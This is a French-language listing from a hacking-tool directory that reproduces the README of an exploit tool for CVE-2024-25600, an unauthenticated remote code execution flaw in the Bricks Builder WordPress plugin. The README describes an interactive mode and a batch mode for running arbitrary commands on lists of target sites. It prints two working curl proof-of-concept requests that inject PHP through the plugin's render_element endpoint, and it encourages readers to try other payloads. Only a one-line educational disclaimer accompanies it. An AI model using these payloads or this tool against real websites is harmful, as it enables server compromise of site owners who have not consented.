Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils
/
GitHubGitHub
/tornad0007
/cve-2024-25600-bricks-builder-plugin-for-wordpress
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubtornad0007/cve-2024-25600-bricks-builder-plugin-for-wordpress

CVE-2024-25600-Bricks-Builder-plugin-for-WordPress

Voir le dépôt
93il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Cet outil est conçu pour exploiter la vulnérabilité CVE-2024-25600 présente dans le plugin Bricks Builder pour WordPress. Cette vulnérabilité permet l'exécution de code à distance non authentifiée sur les sites web affectés. L'outil automatise le processus d'exploitation en récupérant des nonces et en envoyant des requêtes spécialement conçues pour exécuter des commandes arbitraires.

Partager

CVE-2024-25600 Outil d'exploitation 🚀

Description 📝

Cet outil 🛠️ est conçu pour exploiter la vulnérabilité CVE-2024-25600 🕳️ présente dans le plugin Bricks Builder pour WordPress. Cette vulnérabilité permet une exécution de code à distance non authentifiée sur les sites web affectés 💻. L'outil automatise le processus d'exploitation en récupérant des nonces et en envoyant des requêtes spécialement conçues pour exécuter des commandes arbitraires.

Fonctionnalités 🌟

  • Mode interactif : Interagissez avec le site cible en temps réel 🕹️.
  • Mode par lots : Analysez et exploitez plusieurs sites web à partir d'une liste 📋.
  • Exécution de commandes : Exécutez des commandes arbitraires sur le serveur cible ⚙️.

Installation 🛠️

  1. Clonez ce dépôt sur votre machine locale 🖥️ en utilisant git clone.
  2. Accédez au répertoire du dépôt cloné.
  3. Installez les bibliothèques Python requises en utilisant pip install -r requirements.txt.

Utilisation 📖

Mode interactif 🎮

  1. Lancez l'outil avec python exploit.py -u <URL> pour démarrer le mode interactif.
  2. Suivez les instructions à l'écran pour envoyer des commandes au serveur cible.

Mode par lots 📊

  1. Préparez un fichier texte contenant une liste d'URL cibles.
  2. Lancez l'outil avec python exploit.py -l <chemin_fichier> pour analyser et exploiter les sites listés.

Preuve de concept (PoC) 📝

La preuve de concept de base fournie par la divulgation est la suivante :

curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

Mise à jour : Deuxième PoC (plus fiable)

curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
  -H "Content-Type: application/json" \
  -d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "carousel",
    "settings": {
      "type": "posts",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

Il est possible que des charges utiles supplémentaires donnent de meilleurs résultats. Si mon exploit ou ma preuve de concept ne fonctionne pas pour vous, je vous encourage à expérimenter avec d'autres charges utiles pour trouver une solution plus efficace.

Remplacez [HOST] par le site cible et [NONCE] par la valeur du nonce récupérée du site.

Référence 📖

Pour plus d'informations sur la vulnérabilité CVE-2024-25600, veuillez consulter la divulgation détaillée sur Snicco.io.

Avertissement ⚠️

Les informations fournies dans ce README sont uniquement à des fins éducatives. Le piratage non autorisé de sites web ou de réseaux est illégal et contraire à l'éthique. 🚫

Remerciements 🙏

Félicitations aux chercheurs en sécurité qui ont découvert et signalé cette vulnérabilité, fournissant à la communauté des informations et des outils pour sécuriser leurs applications web.

Télécharger l’outil